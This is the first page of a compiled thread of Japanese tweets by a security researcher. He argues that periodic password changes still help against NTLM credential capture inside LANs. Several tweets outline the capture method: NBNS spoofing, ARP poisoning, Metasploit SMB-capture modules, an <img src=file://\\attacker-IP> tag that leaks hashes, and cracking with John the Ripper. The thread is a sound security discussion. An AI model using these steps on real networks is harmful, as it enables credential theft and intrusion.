北河さんのWindowsのパスワードネタに関するつぶやき

自民党の情報セキュリティ提言「パスワードを定期変更すべき」を発端とした@kitagawa_takujiさんによるWindowsパスワードに関するつぶやきのまとめ。
2
北河拓士🔰 @kitagawa_takuji

Webサービスの認証の場合、パスワードの定期変更は無意味と言えるが、LAN内に攻撃者がいた場合に、脆弱性を利用しなくても容易にチャレンジ・レスポンスが取得可能なNTLM認証の場合はパスワードの定期変更も一定の意味を持つ、よって両者は分けて議論する必要があると思うがな、(続

2012-02-25 14:25:21
北河拓士🔰 @kitagawa_takuji

続)最も簡単に解析されないような複雑なパスワードにすることのほうが優先度は高いのは言うまでもないが

2012-02-25 14:27:59
北河拓士🔰 @kitagawa_takuji

LAN内からの攻撃であれば、NBNSレスポンスを攻撃者のIPに偽装して、送られてくるクレデンシャルをキャプチャ、後はレインボークラックかjohn teh ripperで解析というシナリオが一番簡単。これはプロトコル上の仕様なのでパッチを最新にしても防ぎ様がないし、気づくのも難しい

2012-02-25 14:40:00
北河拓士🔰 @kitagawa_takuji

NETLM, NETLMv2, NETNTLM, NETNTLMv2などのキャプチャしたチャレンジ・レスポンス形式のハッシュをjohnで解析するにはjumbo patchが当ったものを使う必要がある

2012-02-25 14:55:28
北河拓士🔰 @kitagawa_takuji

ネットワーク上のチャレンジ・レスポンスのキャプチャではなく、脆弱性を使って侵入されてメモリやレジストリからハッシュをdumpされた場合、例え絶対に解析できない複雑なパスワードを使用していたとしてもPass-the-Hashでハッシュ値だけでログイン可能。(続

2012-02-25 15:08:29
北河拓士🔰 @kitagawa_takuji

続)パスワードの変更がなければ何年にも渡り情報を盗み見られる可能性がある。パスワードを定期変更すれば再度侵入してハッシュを取得しなければならないが、その時には脆弱性が塞がれているかもしれないし、何度も攻撃を行うのは発見されるリクスが高まる。よって定期変更も一定の効果はある。

2012-02-25 15:12:35
北河拓士🔰 @kitagawa_takuji

NBNS responseのSpoofとSMB captureを使った攻撃例、ちょっとわかり難いが http://t.co/DJf6WULR

2012-02-25 15:20:15
北河拓士🔰 @kitagawa_takuji

SMB captureを使った攻撃例はHacker Japan2011年3月号や続・ハッキングの達人のMetasploit特集でも書いた。その時は<img src=file://\\xx.xx.xx.xx\image.gif>というタグを含んだHTMLメールを使ったが、(続

2012-02-25 15:24:20
北河拓士🔰 @kitagawa_takuji

続)HTMLメールより、NBNS responseの偽装の方がより効果的だと思う。

2012-02-25 15:25:59
北河拓士🔰 @kitagawa_takuji

パスワードの定期変更はshadowパスワードがなかった頃の名残だという説を聞いたことがあるけど、NTLM認証の場合、LAN内にちょっと悪意の有るものがいれは簡単にチャレンジ・レソポンスを入手して解析可能なわけで、shadowパスワードがない状態とほぼ同じと考えたほうが良いと思う。

2012-02-25 15:46:29
北河拓士🔰 @kitagawa_takuji

衆参両院のネットワークの場合、国を取ろうとして対立している政党が1つのネットワークに同舟しているわけで、外部からの脅威だけとは限らない。また、標的型メール攻撃などでどれか一人の端末が乗っ取られれば内部からと同じ脅威が生じる。

2012-02-25 16:05:05
北河拓士🔰 @kitagawa_takuji

もう一度繰り返すと、Webサービスの認証の場合、パスワードの定期変更は無意味かもしれないが、LAN内に攻撃者がいた場合のSMB/CIFSのNTLM認証を考えた場合、定期変更も一定の効果があるのではないか?それを一緒くたにして定期変更は無意味と切り捨てるのはどうかと思う。

2012-02-25 16:55:51
北河拓士🔰 @kitagawa_takuji

Pass-the-Hashの対処方法として優先すべきなのはパスワードの使い回しを避けることなのだが、企業内の管理パスワードの使い回しは十数年前から問題になっているにもかかわらず一向に解消されていないのも事実。

2012-02-25 18:22:16
北河拓士🔰 @kitagawa_takuji

LMハッシュ/NTLMハッシュとLM認証/NTLM認証を混同している人がいるのかな?

2012-02-25 19:16:55
北河拓士🔰 @kitagawa_takuji

LM/NTLM認証のチャレンジ/レスポンスを取得する方法をまとめてみる。取得したチャレンジ/レスポンスはJohn the Ripperで辞書攻撃、総当り攻撃で解析可能

2012-02-26 12:10:37
北河拓士🔰 @kitagawa_takuji

1.Ettercap http://t.co/ePAApvQa Cain&Abel http://t.co/tCnrS54O 等で、ARP PoisoningによるLayer2でのキャプチャ

2012-02-26 12:11:39
北河拓士🔰 @kitagawa_takuji

2.NetBIOSの名前要求に対し攻撃者のIPを返す。攻撃者のIPに飛んで来た認証要求に対し固定のチャレンジを返し、それに対するレスポンスを取得

2012-02-26 12:12:43
北河拓士🔰 @kitagawa_takuji

2に対しては JoMo-Kunのツール http://t.co/q15xgb4V やMetasploitの auxiliary/spoof/nbns/nbns_response と auxiliary/server/capture/smb の組み合わせが使える

2012-02-26 12:13:20
北河拓士🔰 @kitagawa_takuji

3.社内Webなどに<img src=file://\\攻撃者のIP\image.gif>というタグを含んだページを作成、攻撃者のIPに来た認証要求をMetasploitの auxiliary/server/capture/smb でキャプチャ

2012-02-26 12:14:01
北河拓士🔰 @kitagawa_takuji

他にも色々方法があると思う。取得したチャレンジ/レスポンスはJohn the Ripperで辞書攻撃、総当り攻撃で解析、JtRではNETLM, NETLMv2, NETNTLM, NETNTLMv2に対応している。

2012-02-26 12:14:32
北河拓士🔰 @kitagawa_takuji

LMの前半7文字部分だけならRainbow Tableが ftp://freerainbowtables.mirror.garr.it/mirrors/freerainbowtables/halflmchall/ で公開されている

2012-02-26 12:14:56
北河拓士🔰 @kitagawa_takuji

LM/NTLM認証のハッシュはLAN内に悪意の有るものがいれば簡単に取得可能。shadowに対応していない/etc/passwdと同じように最初からハッシュが晒されていることを前提に、簡単には解析できない十分に複雑なパスワードを設定する必要がある。

2012-02-26 12:22:12
北河拓士🔰 @kitagawa_takuji

パスワードの有効期限を設定するよりは、パスワードの最低長を十分大きいものにする方が重要だが、有効期限を設定することも全く無意味とは言えない。

2012-02-26 12:26:38
北河拓士🔰 @kitagawa_takuji

@totoromasaki それだったら12文字の方が良いと思います。毎回パスワード変更しないといけないとなると、ずっとログインしっぱなしの人が出てくると思うので、ただ英数字12文字ではちょっと弱いと思います。12文字なら大小英数字記号混在、英数字だけなら15文字以上ですかね

2012-02-26 12:51:31
北河拓士🔰 @kitagawa_takuji

Webサービスの認証の場合、ストレッチ回数を調整し計算量を増やすことで有効期限をなくしたり、最低文字数を小さくして利便性を上げることができるが、LM/NTLMの場合、計算量は固定。しかも10数年前の設計で現在のようにGPUを使用した並列処理などは考慮されていない。(続

2012-02-26 13:15:03
1 ・・ 4 次へ